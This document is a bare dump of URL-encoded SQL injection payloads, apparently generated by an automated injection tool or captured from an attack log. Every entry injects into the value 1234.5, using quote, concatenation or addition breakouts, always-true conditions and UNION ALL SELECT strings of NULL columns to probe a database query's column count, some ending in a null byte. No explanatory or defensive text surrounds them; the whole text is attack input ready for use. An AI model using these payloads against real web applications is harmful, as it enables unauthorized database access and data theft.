1234.5%27%20WHERE%201578%3D1578%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%209922%3D9922%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%204814%3D4814%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%203852%3D3852%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%206953%3D6953%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%206244%3D6244%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%205147%3D5147%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%205808%3D5808%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%204661%3D4661%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%208295%3D8295%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%201017%3D1017%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%209130%3D9130%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20%7C%7C%20%28SELECT%208333%20FROM%20DUAL%20WHERE%207434%3D7434%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208350%20FROM%20DUAL%20WHERE%208299%3D8299%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202366%20FROM%20DUAL%20WHERE%206014%3D6014%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207246%20FROM%20DUAL%20WHERE%209477%3D9477%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201691%20FROM%20DUAL%20WHERE%203607%3D3607%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202378%20FROM%20DUAL%20WHERE%209127%3D9127%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%206913%20FROM%20DUAL%20WHERE%201198%3D1198%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207474%20FROM%20DUAL%20WHERE%202640%3D2640%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202193%20FROM%20DUAL%20WHERE%205533%3D5533%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201052%20FROM%20DUAL%20WHERE%204843%3D4843%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203066%20WHERE%206737%3D6737%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207106%20WHERE%209611%3D9611%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201264%20WHERE%206765%3D6765%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201917%20WHERE%201206%3D1206%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203925%20WHERE%203166%3D3166%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204404%20WHERE%202510%3D2510%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205054%20WHERE%205588%3D5588%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208084%20WHERE%202734%3D2734%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202697%20WHERE%208067%3D8067%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207915%20WHERE%204437%3D4437%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%207375%20FROM%20DUAL%20WHERE%203859%3D3859%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%204493%20FROM%20DUAL%20WHERE%206533%3D6533%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%207116%20FROM%20DUAL%20WHERE%201625%3D1625%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%203682%20FROM%20DUAL%20WHERE%203159%3D3159%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%203056%20FROM%20DUAL%20WHERE%203414%3D3414%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%208739%20FROM%20DUAL%20WHERE%202808%3D2808%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%207775%20FROM%20DUAL%20WHERE%201288%3D1288%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%205215%20FROM%20DUAL%20WHERE%204861%3D4861%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%209263%20FROM%20DUAL%20WHERE%209012%3D9012%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%209202%20FROM%20DUAL%20WHERE%206282%3D6282%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%201057%20WHERE%201371%3D1371%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 